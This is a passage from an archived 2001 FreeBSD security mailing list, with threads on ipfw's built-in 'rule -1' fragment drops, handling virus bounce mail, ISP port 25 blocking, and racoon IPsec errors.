Message-Id: <200103141605.IAA47316@gndrsh.dnsmgr.net>
Subject: Re: ipfw rule -1?
In-Reply-To: <20010313232014.B496@cjc-desktop.users.reflexcom.com> from "Crist J. Clark" at "Mar 13, 2001 11:20:14 pm"
To: cjclark@alum.mit.edu
Date: Wed, 14 Mar 2001 08:05:25 -0800 (PST)
Cc: alan@batie.org (Alan Batie), security@FreeBSD.ORG
X-Mailer: ELM [version 2.4ME+ PL54 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
> On Tue, Mar 13, 2001 at 08:40:20AM -0800, Alan Batie wrote:
> > I'm seeing a few of these in my ipfw log and was wondering what rule -1 is?
> > I couldn't find anything about it in the man page...
> >
> > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16
> > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16
> > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16
> > > ipfw: -1 Refuse TCP 62.29.124.91:97 199.2.210.241:29540 in via etha16
> > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16
>
> The manpage does not go as far as to indicate that this is rule -1,
> but it does say this happens,
>
> FINE POINTS
> o There is one kind of packet that the firewall will always discard,
> that is a TCP packet's fragment with a fragment offset of one. This
> is a valid packet, but it only has one use, to try to circumvent
> firewalls.
>
> Rule -1 is given for any packet dropped, but not dropped due to a user
> rule or the default rule. A quick look at the souce indicates the
> above pseudo-rule and some other fragment issues (bogusfrag) are the
> only such situations.
>
> OK, I've answered this one enough times now. Should I send in a PR
> with patch to the manpage or is this for the FAQ?
Patch the manpage, and the FAQ. Specifically mention the rule number -1
as being a builtin unalterable set of rules, and describe exactly what those
rules are.
Thanks,
--
Rod Grimes - KD7CAX @ CN85sl - (RWG25) rgrimes@gndrsh.dnsmgr.net
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Wed Mar 14 8:12:49 2001
Delivered-To: freebsd-security@freebsd.org
Received: from orestes.cs.brandeis.edu (orestes.cs.brandeis.edu [129.64.3.188])
by hub.freebsd.org (Postfix) with ESMTP id 6481237B718
for <security@FreeBSD.ORG>; Wed, 14 Mar 2001 08:12:45 -0800 (PST)
(envelope-from meshko@orestes.cs.brandeis.edu)
Received: from localhost (meshko@localhost)
by orestes.cs.brandeis.edu (8.9.3/8.9.3) with ESMTP id LAA03889;
Wed, 14 Mar 2001 11:12:29 -0500
Date: Wed, 14 Mar 2001 11:12:29 -0500 (EST)
From: Mikhail Kruk <meshko@cs.brandeis.edu>
To: "Rodney W. Grimes" <freebsd@gndrsh.dnsmgr.net>
Cc: <cjclark@alum.mit.edu>, Alan Batie <alan@batie.org>,
<security@FreeBSD.ORG>
Subject: Re: ipfw rule -1?
In-Reply-To: <200103141605.IAA47316@gndrsh.dnsmgr.net>
Message-ID: <Pine.LNX.4.30.0103141109190.2204-100000@orestes.cs.brandeis.edu>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
> > Rule -1 is given for any packet dropped, but not dropped due to a user
> > rule or the default rule. A quick look at the souce indicates the
> > above pseudo-rule and some other fragment issues (bogusfrag) are the
> > only such situations.
> >
> > OK, I've answered this one enough times now. Should I send in a PR
> > with patch to the manpage or is this for the FAQ?
>
> Patch the manpage, and the FAQ. Specifically mention the rule number -1
> as being a builtin unalterable set of rules, and describe exactly what those
> rules are.
Looks like a docs thread, not a security, but I'll stick my 2 cents...
I don't think that something that is in a man page and can be easily found
in it without even reading the whole thing (search for -1?) belongs to the
FAQ. FAQ is for problems which are not easily solved using man because
it's unclear where to look for the answer, IMHO.
I vote for man page only.
> Thanks,
> --
> Rod Grimes - KD7CAX @ CN85sl - (RWG25) rgrimes@gndrsh.dnsmgr.net
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Wed Mar 14 8:30:49 2001
Delivered-To: freebsd-security@freebsd.org
Received: from w2xo.pgh.pa.us (18.gibs5.xdsl.nauticom.net [209.195.184.19])
by hub.freebsd.org (Postfix) with ESMTP id 7B0F237B719
for <freebsd-security@FreeBSD.ORG>; Wed, 14 Mar 2001 08:30:40 -0800 (PST)
(envelope-from durham@w2xo.pgh.pa.us)
Received: from shazam (shazam [192.168.5.3])
by w2xo.pgh.pa.us (8.11.2/8.9.3) with ESMTP id f2EGTmq44176;
Wed, 14 Mar 2001 16:29:52 GMT
(envelope-from durham@w2xo.pgh.pa.us)
Date: Wed, 14 Mar 2001 11:31:05 -0500 (EST)
From: Jim Durham <durham@w2xo.pgh.pa.us>
X-Sender: durham@shazam.int
To: "Bruce M. Walker" <bmw@borderware.com>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Sophos and Virus return mail
In-Reply-To: <200103141308.f2ED84E11909@fusion.borderware.com>
Message-ID: <Pine.BSF.4.21.0103141119450.1452-100000@shazam.int>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
On Wed, 14 Mar 2001, Bruce M. Walker wrote:
> Jim Durham wrote:
> >
> > I thought of rewriting the script to use the "From: " address
> > to reply. I think that would usually work, but I'm not sure
> > that address always appears either.
>
> Unhappily not:
>
> From: Hahaha <hahaha@sexyfun.net>
>
> You can see the IP of the host that sent it to you in the Received:
> headers if you inspect them, but that will be simply the Windows
> PC that itself has been infected. Snowhite contains a complete
> SMTP send-only implementation and it delivers to its targets directly.
>
> I'm afraid you're stuck with these things.
>
> (This is one case where blocking of port 25 by ISPs is a good thing.)
>
> -bmw
Yes, SnowWhite is probably a bad example, as, like you say, it
doesn't generate a replyable "From:" address. I didn't ask
my question correctly. Some Viruses generate no envelope
"from" but *do* generate a "From: ". I was thinking about
the ramifications of changing the script to use the "From: "
if the envelope is not there.
SO...
if (from)... reply to from
else if (From: ) reply to From:
else reply to MAILER-DAEMON (sigh...)
Another thing that might be done is ... and I've done this by hand
a couple times, which gets old... dig out the "ppp-4027dialup@bigisp.net"
and the time from the headers and generate a reply to:
"abuse@bigisp.net". Giving the time of the abuse and the dialup.
Maybe if we started using
Sadly, I don't think ISPs pay much attention to "abuse" e-mail, though.
(Another sigh). I've never gotten a response to an abuse report.
This "Virus in your mail to:" stuff gets old..
Yes, I knew what you meant about port 25.. no need to explain.
Brains are much faster than fingers..
Jim Durham
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Wed Mar 14 8:36:53 2001
Delivered-To: freebsd-security@freebsd.org
Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193])
by hub.freebsd.org (Postfix) with ESMTP id 7C31537B71A
for <freebsd-security@FreeBSD.ORG>; Wed, 14 Mar 2001 08:36:51 -0800 (PST)
(envelope-from wollman@khavrinen.lcs.mit.edu)
Received: (from wollman@localhost)
by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id LAA49036;
Wed, 14 Mar 2001 11:36:37 -0500 (EST)
(envelope-from wollman)
Date: Wed, 14 Mar 2001 11:36:37 -0500 (EST)
From: Garrett Wollman <wollman@khavrinen.lcs.mit.edu>
Message-Id: <200103141636.LAA49036@khavrinen.lcs.mit.edu>
To: Jim Durham <durham@w2xo.pgh.pa.us>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Sophos and Virus return mail
In-Reply-To: <Pine.BSF.4.21.0103141119450.1452-100000@shazam.int>
References: <200103141308.f2ED84E11909@fusion.borderware.com>
<Pine.BSF.4.21.0103141119450.1452-100000@shazam.int>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
<<On Wed, 14 Mar 2001 11:31:05 -0500 (EST), Jim Durham <durham@w2xo.pgh.pa.us> said:
> if (from)... reply to from
> else if (From: ) reply to From:
> else reply to MAILER-DAEMON (sigh...)
Better choice:
send_notice_to(envelope_destination);
drop_message();
-GAWollman
--
Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same
wollman@lcs.mit.edu | O Siem / The fires of freedom
Opinions not those of| Dance in the burning flame
MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Wed Mar 14 8:45:16 2001
Delivered-To: freebsd-security@freebsd.org
Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4])
by hub.freebsd.org (Postfix) with ESMTP id 546D437B71A
for <security@FreeBSD.ORG>; Wed, 14 Mar 2001 08:45:12 -0800 (PST)
(envelope-from freebsd@gndrsh.dnsmgr.net)
Received: (from freebsd@localhost)
by gndrsh.dnsmgr.net (8.9.3/8.9.3) id IAA47445;
Wed, 14 Mar 2001 08:45:00 -0800 (PST)
(envelope-from freebsd)
From: "Rodney W. Grimes" <freebsd@gndrsh.dnsmgr.net>
Message-Id: <200103141645.IAA47445@gndrsh.dnsmgr.net>
Subject: Re: ipfw rule -1?
In-Reply-To: <Pine.LNX.4.30.0103141109190.2204-100000@orestes.cs.brandeis.edu> from Mikhail Kruk at "Mar 14, 2001 11:12:29 am"
To: meshko@cs.brandeis.edu (Mikhail Kruk)
Date: Wed, 14 Mar 2001 08:45:00 -0800 (PST)
Cc: cjclark@alum.mit.edu, alan@batie.org (Alan Batie),
security@FreeBSD.ORG
X-Mailer: ELM [version 2.4ME+ PL54 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
> > > Rule -1 is given for any packet dropped, but not dropped due to a user
> > > rule or the default rule. A quick look at the souce indicates the
> > > above pseudo-rule and some other fragment issues (bogusfrag) are the
> > > only such situations.
> > >
> > > OK, I've answered this one enough times now. Should I send in a PR
> > > with patch to the manpage or is this for the FAQ?
> >
> > Patch the manpage, and the FAQ. Specifically mention the rule number -1
> > as being a builtin unalterable set of rules, and describe exactly what those
> > rules are.
>
> Looks like a docs thread, not a security, but I'll stick my 2 cents...
> I don't think that something that is in a man page and can be easily found
> in it without even reading the whole thing (search for -1?) belongs to the
> FAQ. FAQ is for problems which are not easily solved using man because
> it's unclear where to look for the answer, IMHO.
> I vote for man page only.
90% of what is in the FAQ can be found in man pages. If we apply your
reasoning to the FAQ we could reduce it to 1/10th it's current size :-)
--
Rod Grimes - KD7CAX @ CN85sl - (RWG25) rgrimes@gndrsh.dnsmgr.net
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Wed Mar 14 12:16:48 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.gmx.net (pop.gmx.net [194.221.183.20])
by hub.freebsd.org (Postfix) with SMTP id 899F137B71A
for <freebsd-security@freebsd.org>; Wed, 14 Mar 2001 12:16:40 -0800 (PST)
(envelope-from Gerhard.Sittig@gmx.net)
Received: (qmail 5833 invoked by uid 0); 14 Mar 2001 20:16:38 -0000
Received: from p3ee20a8c.dip.t-dialin.net (HELO speedy.gsinet) (62.226.10.140)
by mail.gmx.net (mp022-rz3) with SMTP; 14 Mar 2001 20:16:38 -0000
Received: (from sittig@localhost)
by speedy.gsinet (8.8.8/8.8.8) id TAA22480
for freebsd-security@freebsd.org; Wed, 14 Mar 2001 19:18:31 +0100
Date: Wed, 14 Mar 2001 19:18:31 +0100
From: Gerhard Sittig <Gerhard.Sittig@gmx.net>
To: freebsd-security@freebsd.org
Subject: Re: ICMP attacks
Message-ID: <20010314191831.W20830@speedy.gsinet>
Mail-Followup-To: freebsd-security@freebsd.org
References: <980521178.3a7190da7ba07@mail.marketnews.com> <NEBBIEGPMLMKDBMMICFNAECNEMAA.mit@mitayai.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0i
In-Reply-To: <NEBBIEGPMLMKDBMMICFNAECNEMAA.mit@mitayai.net>; from mit@mitayai.net on Wed, Mar 14, 2001 at 02:29:17AM -0500
Organization: System Defenestrators Inc.
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
On Wed, Mar 14, 2001 at 02:29 -0500, Will Mitayai Keeso Rowe wrote:
>
> i'd love to use snort, but i keep getting this:
>
> [castle:root]/usr/ports/security/snort# make -DWITH_MYSQL=yes clean install
> ===> Cleaning for snort-1.7
> ===> Extracting for snort-1.7
> >> Checksum OK for snort-1.7.tar.gz.
>
> gzip: stdout: Broken pipe
> ===> Patching for snort-1.7
> ===> Configuring for snort-1.7
>
This is only a problem *if* the configure / build steps fail,
too. But if they do, you should cite _these_ messages.
virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76
Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net
--
If you don't understand or are scared by any of the above
ask your parents or an adult to help you.
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Wed Mar 14 13:11: 0 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.ruhr.de (in-ruhr4.ruhr.de [212.23.134.2])
by hub.freebsd.org (Postfix) with SMTP id D7C8937B71C
for <security@FreeBSD.ORG>; Wed, 14 Mar 2001 13:10:56 -0800 (PST)
(envelope-from ue@nathan.ruhr.de)
Received: (qmail 3421 invoked by uid 10); 14 Mar 2001 21:10:54 -0000
Received: (from ue@localhost)
by nathan.ruhr.de (8.11.3/8.11.2) id f2EL6EL94714
for security@FreeBSD.ORG; Wed, 14 Mar 2001 22:06:14 +0100 (CET)
(envelope-from ue)
Date: Wed, 14 Mar 2001 22:06:14 +0100
From: Udo Erdelhoff <ue@nathan.ruhr.de>
To: security@FreeBSD.ORG
Subject: Re: ipfw rule -1?
Message-ID: <20010314220613.L83336@nathan.ruhr.de>
Mail-Followup-To: security@FreeBSD.ORG
References: <20010313084020.A5859@agora.rdrop.com> <20010313232014.B496@cjc-desktop.users.reflexcom.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010313232014.B496@cjc-desktop.users.reflexcom.com>; from cjclark@reflexnet.net on Tue, Mar 13, 2001 at 11:20:14PM -0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
On Tue, Mar 13, 2001 at 11:20:14PM -0800, Crist J. Clark wrote:
> Rule -1 is given for any packet dropped, but not dropped due to a user
> rule or the default rule. A quick look at the souce indicates the
> above pseudo-rule and some other fragment issues (bogusfrag) are the
> only such situations.
Hmm, I have the following setup: A -current box mounts /usr/src5 and
/usr/obj5 via NFS from a RELENG_4 box. Doing "make installworld" fails
as soon there's a fragmented NFS packet - the fragments are dropped
by rule -1.
I switched to a kernel without ipfw to be able to complete the installworld.
The kernel was PRE_SMPNG. Were there any bugfixes in this area or should
I try to reproduce the problem with a current -current?
/s/Udo
--
I figure that if the burned hand teaches best,
then the entire scorched epidermis simply has to get its point across.
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Wed Mar 14 14:14:47 2001
Delivered-To: freebsd-security@freebsd.org
Received: from sol.cc.u-szeged.hu (sol.cc.u-szeged.hu [160.114.8.24])
by hub.freebsd.org (Postfix) with ESMTP id 154C737B718
for <freebsd-security@freebsd.org>; Wed, 14 Mar 2001 14:14:44 -0800 (PST)
(envelope-from sziszi@petra.hos.u-szeged.hu)
Received: from petra.hos.u-szeged.hu by sol.cc.u-szeged.hu (8.9.3+Sun/SMI-SVR4)
id XAA02100; Wed, 14 Mar 2001 23:14:42 +0100 (MET)
Received: from sziszi by petra.hos.u-szeged.hu with local (Exim 3.12 #1 (Debian))
id 14dJXW-0004EX-00
for <freebsd-security@FreeBSD.ORG>; Wed, 14 Mar 2001 23:14:42 +0100
Date: Wed, 14 Mar 2001 23:14:42 +0100
From: Szilveszter Adam <sziszi@petra.hos.u-szeged.hu>
To: freebsd-security@FreeBSD.ORG
Subject: Re: Sophos and Virus return mail
Message-ID: <20010314231442.F12391@petra.hos.u-szeged.hu>
Mail-Followup-To: Szilveszter Adam <sziszi@petra.hos.u-szeged.hu>,
freebsd-security@FreeBSD.ORG
References: <Pine.BSF.4.21.0103140841480.4793-100000@mohegan.mohawk.net> <200103141333.f2EDX0J19096@fusion.borderware.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <200103141333.f2EDX0J19096@fusion.borderware.com>; from bmw@borderware.com on Wed, Mar 14, 2001 at 08:33:00AM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
> Ralph Huntington wrote:
> > > (This is one case where blocking of port 25 by ISPs is a good thing.)
Yes. And makes using eg send-pr(1) real fun(TM). Enjoying all the benefits
of such a setup right now. While we are at it, why not firewall off the
whole Net by just allowing a few things through proxies like www and ftp
just so that a few morons are safe? Anyways, who would use such esoteric
things as "cvsps" or "cvsup" and what are these etc. You can see where this
is leading. Unfortunately network administration only looks simple if you
are the one sitting at the admin console. Otherwise, it can quickly become
a set of annoying limitations that hinder you @work or @play. Cool. I
really feel like paying a lot for Internet access with these conditions.
In the meantime, I guess most virus infections are due to the fact that
(l)users go to really great lenghts to open anything that says "Big
tits inside" or "Check out this nice music." today, it's email. Tomorrow,
it will likely be mobile devices. The day after tomorrow... who knows?
Sorry for the OT, but I really felt I needed to tell this some time... not
all FreeBSD/UNIX afficionados are sysops at the same time, much less
network ops at their place.
--
Regards:
Szilveszter ADAM
Szeged University
Szeged Hungary
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Wed Mar 14 15:47:58 2001
Delivered-To: freebsd-security@freebsd.org
Received: from daedalus.cs.brandeis.edu (daedalus.cs.brandeis.edu [129.64.3.179])
by hub.freebsd.org (Postfix) with ESMTP id 314E737B77B
for <freebsd-security@FreeBSD.ORG>; Wed, 14 Mar 2001 15:47:51 -0800 (PST)
(envelope-from meshko@daedalus.cs.brandeis.edu)
Received: from localhost (meshko@localhost)
by daedalus.cs.brandeis.edu (8.9.3/8.9.3) with ESMTP id SAA03451;
Wed, 14 Mar 2001 18:47:45 -0500
Date: Wed, 14 Mar 2001 18:47:45 -0500 (EST)
From: Mikhail Kruk <meshko@cs.brandeis.edu>
To: Szilveszter Adam <sziszi@petra.hos.u-szeged.hu>
Cc: <freebsd-security@FreeBSD.ORG>
Subject: Re: Sophos and Virus return mail
In-Reply-To: <20010314231442.F12391@petra.hos.u-szeged.hu>
Message-ID: <Pine.LNX.4.30.0103141845170.3442-100000@daedalus.cs.brandeis.edu>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
> > Ralph Huntington wrote:
> > > > (This is one case where blocking of port 25 by ISPs is a good thing.)
>
> Yes. And makes using eg send-pr(1) real fun(TM). Enjoying all the benefits
> of such a setup right now. While we are at it, why not firewall off the
> whole Net by just allowing a few things through proxies like www and ftp
> just so that a few morons are safe? Anyways, who would use such esoteric
> things as "cvsps" or "cvsup" and what are these etc. You can see where this
> is leading. Unfortunately network administration only looks simple if you
> are the one sitting at the admin console. Otherwise, it can quickly become
> a set of annoying limitations that hinder you @work or @play. Cool. I
> really feel like paying a lot for Internet access with these conditions.
My DSL provider, Mindspring, blocks port 25 and I am quite happy about it.
Of course send-pr doesn't work out of the box, but you can configure
everything to work through their mail server. Blocking one port is very
far from blocking all ports except 80, it's a bad analogy. This measure is
directed at a very specific kind of activity (spamming) and does not
affect vast majority of the users.
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Wed Mar 14 16:41: 5 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21])
by hub.freebsd.org (Postfix) with ESMTP id 53C1D37B718
for <freebsd-security@FreeBSD.ORG>; Wed, 14 Mar 2001 16:41:01 -0800 (PST)
(envelope-from rjh@mohawk.net)
Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21])
by mohegan.mohawk.net (8.9.3/8.9.3) with ESMTP id TAA24722;
Wed, 14 Mar 2001 19:55:59 -0500 (EST)
(envelope-from rjh@mohawk.net)
Date: Wed, 14 Mar 2001 19:55:59 -0500 (EST)
From: Ralph Huntington <rjh@mohawk.net>
To: Mikhail Kruk <meshko@cs.brandeis.edu>
Cc: Szilveszter Adam <sziszi@petra.hos.u-szeged.hu>,
freebsd-security@FreeBSD.ORG
Subject: Re: Sophos and Virus return mail
In-Reply-To: <Pine.LNX.4.30.0103141845170.3442-100000@daedalus.cs.brandeis.edu>
Message-ID: <Pine.BSF.4.21.0103141954100.24577-100000@mohegan.mohawk.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
No, Ralph Huntington did not write that. He responded to that, as you have
done. Someone else said that about port 25 and ISPs. So] let's drop it
already.
On Wed, 14 Mar 2001, Mikhail Kruk wrote:
> > > Ralph Huntington wrote:
> > > > > (This is one case where blocking of port 25 by ISPs is a good thing.)
> >
> > Yes. And makes using eg send-pr(1) real fun(TM). Enjoying all the benefits
> > of such a setup right now. While we are at it, why not firewall off the
> > whole Net by just allowing a few things through proxies like www and ftp
> > just so that a few morons are safe? Anyways, who would use such esoteric
> > things as "cvsps" or "cvsup" and what are these etc. You can see where this
> > is leading. Unfortunately network administration only looks simple if you
> > are the one sitting at the admin console. Otherwise, it can quickly become
> > a set of annoying limitations that hinder you @work or @play. Cool. I
> > really feel like paying a lot for Internet access with these conditions.
>
> My DSL provider, Mindspring, blocks port 25 and I am quite happy about it.
> Of course send-pr doesn't work out of the box, but you can configure
> everything to work through their mail server. Blocking one port is very
> far from blocking all ports except 80, it's a bad analogy. This measure is
> directed at a very specific kind of activity (spamming) and does not
> affect vast majority of the users.
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Wed Mar 14 18: 5:43 2001
Delivered-To: freebsd-security@freebsd.org
Received: from dell.dannyland.org (dell.dannyland.org [64.81.36.13])
by hub.freebsd.org (Postfix) with ESMTP id CFB7937B71A
for <freebsd-security@freebsd.org>; Wed, 14 Mar 2001 18:05:39 -0800 (PST)
(envelope-from dannyman@toldme.com)
Received: by dell.dannyland.org (Postfix, from userid 1001)
id D4D125BF9; Wed, 14 Mar 2001 18:05:53 -0800 (PST)
Date: Wed, 14 Mar 2001 18:05:53 -0800
From: dannyman <dannyman@toldme.com>
To: Jim Durham <durham@w2xo.pgh.pa.us>
Cc: freebsd-security@freebsd.org
Subject: Re: Sophos and Virus return mail
Message-ID: <20010314180553.M3500@dell.dannyland.org>
References: <Pine.BSF.4.21.0103132338550.27904-100000@shazam.int>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0.1i
In-Reply-To: <Pine.BSF.4.21.0103132338550.27904-100000@shazam.int>; from durham@w2xo.pgh.pa.us on Tue, Mar 13, 2001 at 11:54:01PM -0500
X-Loop: djhoward@uiuc.edu
X-URL: http://www.dannyland.org/~dannyman/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
On Tue, Mar 13, 2001 at 11:54:01PM -0500, Jim Durham wrote:
> Great discussion going on about Sophos and Amavis!
>
> This may be something I'm missing, but there are several
> virii that apparently send no "envelope from" address when
> they generate virus mail. One that comes to mind is the
> stupid "Snow White" thing.
[...]
I get a couple of those a day in my root folder.
At least.
I just check the originating IP and make sure it is not one of my users. :)
-d
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Wed Mar 14 18:37:18 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mine.kame.net (kame195.kame.net [203.178.141.195])
by hub.freebsd.org (Postfix) with ESMTP
id 323CC37B718; Wed, 14 Mar 2001 18:37:14 -0800 (PST)
(envelope-from sakane@ydc.co.jp)
Received: from localhost ([3ffe:501:4819:1000:260:1dff:fe21:f766])
by mine.kame.net (8.11.1/3.7W) with ESMTP id f2F2aRY24974;
Thu, 15 Mar 2001 11:36:27 +0900 (JST)
To: Bob@Talarian.Com
Cc: FreeBSD-Security@FreeBSD.Org, FreeBSD-Questions@FreeBSD.Org
Subject: Re: Racoon Problem & Cisco Tunnel
In-Reply-To: Your message of "Sun, 11 Mar 2001 22:39:16 -0600"
<3AAC52F4.1000602@Talarian.Com>
References: <3AAC52F4.1000602@Talarian.Com>
X-Mailer: Cue version 0.6 (010224-1625/sakane)
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Message-Id: <20010315113552W.sakane@ydc.co.jp>
Date: Thu, 15 Mar 2001 11:35:52 +0900
From: Shoichi Sakane <sakane@ydc.co.jp>
X-Dispatcher: imput version 20000228(IM140)
Lines: 11
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
> As near as I can tell, I have to run racoon and configure it for
> pre-shared keys to talk to the cisco. But I don't think the racoon is
> even starting right. I get this message: "ERROR:
> pfkey.c:207:pfkey_handler(): pfkey X_SPDDUMP failed No such file or
> directory." Happens with the config files I've written and the stock
> ones. I'm running a freshly sup'd box with racoon-20010222a built from
> ports.
I think there was other reason why racoon couldn't work.
This message means the SPD is empty. It doesn't mean a error happens.
The tag, "ERROR" should be fixed.
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Wed Mar 14 18:59:29 2001
Delivered-To: freebsd-security@freebsd.org
Received: from cs4.cs.ait.ac.th (cs4.cs.ait.ac.th [192.41.170.16])
by hub.freebsd.org (Postfix) with ESMTP id E6F0437B71D
for <freebsd-security@FreeBSD.ORG>; Wed, 14 Mar 2001 18:59:24 -0800 (PST)
(envelope-from on@cs.ait.ac.th)
Received: from banyan.cs.ait.ac.th (on@banyan.cs.ait.ac.th [192.41.170.5])
by cs4.cs.ait.ac.th (8.9.3/8.9.3) with ESMTP id JAA03648
for <freebsd-security@FreeBSD.ORG>; Thu, 15 Mar 2001 09:59:04 +0700 (GMT+0700)
Received: (from on@localhost)
by banyan.cs.ait.ac.th (8.8.5/8.8.5) id JAA15200;
Thu, 15 Mar 2001 09:59:16 +0700 (ICT)
Date: Thu, 15 Mar 2001 09:59:16 +0700 (ICT)
Message-Id: <200103150259.JAA15200@banyan.cs.ait.ac.th>
X-Authentication-Warning: banyan.cs.ait.ac.th: on set sender to on@banyan.cs.ait.ac.th using -f
From: Olivier Nicole <on@cs.ait.ac.th>
To: freebsd-security@FreeBSD.ORG
In-reply-to: <Pine.BSF.4.21.0103141119450.1452-100000@shazam.int> (message
from Jim Durham on Wed, 14 Mar 2001 11:31:05 -0500 (EST))
Subject: Re: Sophos and Virus return mail
References: <Pine.BSF.4.21.0103141119450.1452-100000@shazam.int>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
Hi,
I would like to add my couple of cents to the topic.
Actually you should check Reply-To:, From: then the From enveloppe in
that order.
And in any case copy the email to one of those guys who monitor the
ISP with open relay and publish list for banning.
Port 25 in my opinion MUST be closed, as far as it goes for individual
users. In fact it could be closed even for corporate users as one bad
corporate customer could cause the whole ISP address range to be
banned.
A centralised email exhange point is the only efficient way for an ISP
to control that their users are not doing spam.
As far as relaying, is should be open from outside to inside
(considering the frontier is the ISP email exchange) and from inside
to outside. But not from outside to outside.
To address mobile configuration, say a customer using his laptop
outside the ISP domain, relay can be set-up to open from outside to
outside, for a limited period of time (usially 10 minutes) provided
that the laptop first does a connection with POP or IMAP. The laptop
identifies as a valid user of the ISP so he is allowed to use the
ISP email gateway for a while.
Olivier
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Wed Mar 14 20:21:37 2001
Delivered-To: freebsd-security@freebsd.org
Received: from shorty.ahpcns.com (joemoore-host.dsl.visi.com [209.98.246.61])
by hub.freebsd.org (Postfix) with ESMTP id 0EABD37B718
for <freebsd-security@freebsd.org>; Wed, 14 Mar 2001 20:21:33 -0800 (PST)
(envelope-from jomor@ahpcns.com)
Received: from ahpcns.com (localhost [127.0.0.1])
by shorty.ahpcns.com (Postfix) with ESMTP id 828693A2DD
for <freebsd-security@freebsd.org>; Wed, 14 Mar 2001 22:21:30 -0600 (CST)
Message-ID: <3AB0434A.2DEC2598@ahpcns.com>
Date: Wed, 14 Mar 2001 22:21:30 -0600
From: jomor <jomor@ahpcns.com>
Organization: ahpcns
X-Mailer: Mozilla 4.72 [en] (X11; I; FreeBSD 3.5-STABLE i386)
X-Accept-Language: en
MIME-Version: 1.0
